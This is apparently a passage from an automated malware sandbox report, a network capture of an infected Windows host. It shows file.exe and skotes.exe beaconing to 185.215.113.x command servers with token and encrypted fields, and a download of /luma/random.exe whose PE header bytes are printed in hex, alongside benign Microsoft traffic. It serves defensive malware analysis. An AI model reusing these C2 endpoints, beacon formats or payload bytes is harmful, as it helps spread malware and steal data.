Dec 8, 2024 13:32:03.906770945 CET	1236	IN	Data Raw: 30 ff ad ad 72 fb 30 2b 2b fb 52 a8 f7 55 69 9e 79 92 63 ed f7 53 a1 04 01 3b e4 c3 6a fc ad ad 72 06 54 9d 97 78 34 ac 72 7a e1 a8 f3 bb bd 28 a4 fb ad ad b9 40 a9 ad 72 06 ae 28 8e 16 22 01 6f fb ad a5 24 7e ae ad fd eb 3b ca 76 92 fb d9 ae eb Data Ascii: 0r0++RUiycS;jrTx4rz(@r("o$~;v\~3rBc9Tp0is3eoMjrp0is3d@r:rzS@r)<rlpSR(:rK;B\|rdL=?rKA?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49893	185.215.113.206	80	7368	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 13:32:09.437303066 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJE Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JJDGCGHCGHCBFHJJKKJE--
Dec 8, 2024 13:32:11.278059006 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	50019	185.215.113.43	80	5332	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 13:33:04.664668083 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 8, 2024 13:33:06.013204098 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 12:33:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	50028	185.215.113.43	80	5332	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 13:33:07.638536930 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 39 37 34 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB42974B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Dec 8, 2024 13:33:08.987024069 CET	558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 12:33:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 66 0d 0a 20 3c 63 3e 31 30 31 33 31 38 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 33 31 38 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 33 31 38 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 33 31 38 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 [TRUNCATED] Data Ascii: 16f <c>1013180001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1013181001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1013182001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1013183001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	50031	185.215.113.16	80	5332	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 13:33:09.112217903 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 8, 2024 13:33:10.453243017 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 12:33:10 GMT Content-Type: application/octet-stream Content-Length: 1883648 Last-Modified: Sun, 08 Dec 2024 12:22:56 GMT Connection: keep-alive ETag: "67558fa0-1cbe00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 80 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 4a 00 00 04 00 00 fb 1c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbPgJ@J@\0p 1 2@.rsrc B@.idata 0F@ *@H@wdzyrihuP 0NJ@vkjitsslpJ@.taggant0J"@
Dec 8, 2024 13:33:10.453269958 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 13:33:10.453347921 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 13:33:10.453361988 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 13:33:10.453449011 CET	496	IN	Data Raw: 97 0a cf a8 c3 ef b9 de 7b f2 38 04 e6 df c8 08 42 c2 21 c7 69 1d 4b 90 1a dd 0b 08 fd ff 48 78 e8 e7 ea b2 39 f1 cc a3 c2 e3 a8 c4 ca 6b 81 88 f8 ba b8 a2 6e da 3c 84 7d f4 4d 71 ea 8e ce 83 25 1e ba 25 82 97 39 50 21 f9 99 3a 3a 68 09 85 63 1a Data Ascii: {8B!iKHx9kn<}Mq%%9P!::hcyM^t&n(wcu0JcL>~H}_as.%He`rA%#A[^4K5;)_P QGdQh2%K_W=b%`z
Dec 8, 2024 13:33:10.453461885 CET	1236	IN	Data Raw: a5 4c 52 b8 11 a6 24 2f e9 9e e4 b9 cd d6 a2 d0 0c 08 91 91 cd f9 9e 85 d3 89 9d 8d 51 e2 c2 89 20 a2 7f ce 23 fa b0 66 a0 f0 49 6b 8a 5d f0 91 fd cf 5c 94 37 11 7b 74 70 90 0f 8b ed 28 20 35 63 67 0f 89 30 28 27 c9 4f aa da d8 3f ef 35 47 d8 36 Data Ascii: LR$/Q #fIk]\7{tp( 5cg0('O?5G6On3eet/c~ifABL!}2A4FS_!-+X2?^'I[gKdosI]27[>MHJ_`To
Dec 8, 2024 13:33:10.453471899 CET	1236	IN	Data Raw: 9d 9c db f8 62 bb ed 42 20 14 ab 3c 87 99 a7 4f 4b 96 08 ba c2 5b e6 43 58 37 46 26 ee 42 90 77 17 27 d0 75 63 a8 37 a3 ba dc f0 f4 94 a1 7c 82 ce 41 56 b7 00 dc 9b 09 d3 31 08 ff 21 f3 f3 95 df 60 e4 7e 67 f1 3e 71 7a 02 c9 d6 3d 9e 41 48 8a 89 Data Ascii: bB <OK[CX7F&Bw'uc7\|AV1!`~g>qz=AH5p3^t+r#i ^sXAK: pE1I-,V4~1*S`?V=7BnsBYfU.zL8h/#{MOb^@Mh
Dec 8, 2024 13:33:10.453778982 CET	248	IN	Data Raw: 91 db c6 65 a9 c3 f3 2f 39 d6 e3 73 71 92 4d 07 f3 c6 20 da 6e 42 98 9e 07 3b 90 f1 63 83 88 1f 65 97 a1 e2 49 90 97 68 97 58 3c 91 6a 94 92 8b 60 ff ac d9 a6 fd 00 8a 60 0b 3d 7f 4b 9b 64 a6 c1 3d d0 26 94 f0 89 c2 2d f0 8a 49 02 69 0a 62 77 9e Data Ascii: e/9sqM nB;ceIhX<j``=Kd=&-Iibw08Ih~iwZ5bRo%I<vX=/-N~\,b_T-\1o"c7iC4CtMT[hhHcH~mhu5"
Dec 8, 2024 13:33:10.453789949 CET	1236	IN	Data Raw: 63 9a 11 a5 3d 77 20 cb fa 42 bc 33 d2 f3 6c 82 d3 2b c0 98 75 a3 b8 ba 7d 82 e8 ab 4c 95 4b a3 ce 9c 08 84 b8 84 c7 54 87 ba 35 69 d3 44 3f dd 63 16 7b 96 b6 a7 59 be 5c 52 27 5f 67 c3 eb 13 38 fc d4 1c 3f bb cc 23 7a 63 cd a7 3e e6 8b be 63 6b Data Ascii: c=w B3l+u}LKT5iD?c{Y\R'_g8?#zc>ck&p5/C2C3{L<uqXcoC}`/ygW&ydRhSiq?ml{;(_okQhCGIy>}kOTQ[+'n#7Bp
Dec 8, 2024 13:33:10.453803062 CET	1236	IN	Data Raw: 3a 97 0a 2c 3c d3 d1 df 2d 89 d9 74 8a 2b fa 61 39 8c c7 12 fa 3c f0 8c bb 55 4a bd 3a ba 16 ea 08 93 f2 6f b6 ca 00 78 64 0c f8 54 8a 5a 50 28 53 7a 2b 7c 68 8e 42 84 a5 96 3c cb 83 cb 8c 7e 6f d4 de bb 51 73 ea 57 e6 97 0f e3 4a 67 c2 06 5d 1b Data Ascii: :,<-t+a9<UJ:oxdTZP(Sz+\|hB<~oQsWJg]L8'<_KNW+_7`^5m*9OSh2M= jtgY.H[@gvP5M1F)JEb),/hB(<\2ix yn3nIr4zC
Dec 8, 2024 13:33:10.574856997 CET	1236	IN	Data Raw: 37 09 4c b3 77 ed c0 61 8e ba 0d 64 13 cb a2 28 fc 37 b9 27 12 d2 0d aa 56 ec c8 d1 c2 a6 e9 5f a5 8a 8d 1f 35 5e f8 6a be 1b c8 91 b3 43 01 9b ea 20 c7 06 85 6b 0c 8c f5 cb 98 5d b7 de 29 84 76 a4 bd d9 f2 41 d9 0f 5a 02 02 70 d5 d9 d0 55 d9 9d Data Ascii: 7Lwad(7'V_5^jC k])vAZpU[)#u/}}a;B.83mB<mU?>(+brU:<{=!J qQ<o]u814tync=tFNZ~Sa"_gEyP

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49716	40.126.53.11	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:11 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4831 Host: login.live.com
2024-12-08 12:31:11 UTC	4831	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-12-08 12:31:12 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sun, 08 Dec 2024 12:30:11 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C558_BL2 x-ms-request-id: 1b436141-abc9-4fe7-bf28-fe3ddc95e96b PPServer: PPV: 30 H: BL02EPF0001DA32 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sun, 08 Dec 2024 12:31:11 GMT Connection: close Content-Length: 11197
2024-12-08 12:31:12 UTC	11197	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49717	40.126.53.11	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:11 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4831 Host: login.live.com
2024-12-08 12:31:11 UTC	4831	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-12-08 12:31:12 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sun, 08 Dec 2024 12:30:11 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C558_BL2 x-ms-request-id: 5cd01059-13b7-496b-ac62-3004ed688dc6 PPServer: PPV: 30 H: BL02EPF00027B69 V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sun, 08 Dec 2024 12:31:10 GMT Connection: close Content-Length: 11197
2024-12-08 12:31:12 UTC	11197	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.6	49718	20.223.36.55	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:12 UTC	2594	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241208T123108Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=0afb632b21b94c288a903632d99057e3&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=619573&metered=false&nettype=ethernet&npid=sc-338388&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=619573&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AATPQo87ck+qXC65ASioF4itdaoFBmguJLs3nowrdU0XR2+3aIBbIJUsx3SLMj+VyAKzTx3F/pkz9tNs8Dyop49/1Dp+OALjjmXu0uluM3D3Okpe6hFHh5h//6GZ0A7S3h+MpIS8Mc/vBgdEcEnG007uE3vPLEJnLBv3sudbN1mc3XSaC7nyBMMqYdE3lubBowFBcxStiVabKZtt1IWgxYkl6DhevJ7BboGkxHG0rUtiRXM1IWOOFXjOUAF+GvdGRDqGCXXo3nBQKm6QNiLbX/BSNfYCiiuy78aE/jStrkKWWGdeLcG6O/YC27LvxfNAXzTDrafNzQSLGORblDHzidCsQZgAAEIawaWouonXpJ55XwhnY0HewAeIPNsrVUvYO+hic8VQeMvNDfGPygu96ygPJ/ejKHvzARalYFDGkwIIHxgNUpPVIBsyrENVi//1gkJz/vDXUoU3zAS/ravep8PAMQW02PRTwslizNGknQyQW6Zb1GOp5kGL7wUd1N1zIzUrBsd/Toxix5VhySAkncrpN2FX2ZZwQhUMJ1NpXtlToiDJL2zrHqgvoppWQlUOVdZJwD2SGv8tBmY2VajVgz9CSV/U/0kSCjk9rOTxJmBUwi/NMadempcjmMY6a6V4ixgM15DPzpnxlaEQHrxUnA8kVO7gZYa9s1ujFYQ2jfNauo3+5vqIRWs2V9CObOHQEpvq+NEc8FfUr9R13iiOv+GAcW6+am8/C06GT4qQ0ax2Np3TCF1COjB43JubV2wrHeWAEltDNls2nJ2Zu8QBRCUHtpJJKdnyGjV3TypEH+c0lPsJNY7NiLBrjd0FArhnfewmY+xUXzl9qNfE/iDuocZj2K/G2sMpnJGgr9g+WDrXY4x0v5vmrT3R5oT6bBODnH3EL4VIF5ZkjStjWILNyRe8A5oQtEXoLR2EC9KER9YRiPjbENiaRJdgB&p= Cache-Control: no-cache MS-CV: BIV/rQ3HEUi8aNLi.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-12-08 12:31:12 UTC	814	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 2299 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: S8KDe0aHQlLO3Kjf9tYoKYTyK8LikqAk94mtEBUnWfoeRgU+/OR76CH3DGZXp24FHYIihtEhPfwvaTkrkTNHYld1tihSNVD5smMy1hidt5u6KXg4C0Xw6oDe7UKau1XBBMAsurvR1KUGj+Y5by70NxY3uJmYzlbl9LJo1OhHTVYteAjgFOo9cKQzV6vyA1rCmHqJ2JNqBvplWcwtjmrHqjWKwJz3MnaR2WDucw2lmbt6cBjDAFBJAitPRlq/8WEhWRKDUZcr7QYQUDwGNHdqLQ+ezCkMyxHtaVsmXHPBniFCM/heM0Pj7mKF+2nAaEBOB9mdndgH5PWkWQmZMpHPeA== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sun, 08 Dec 2024 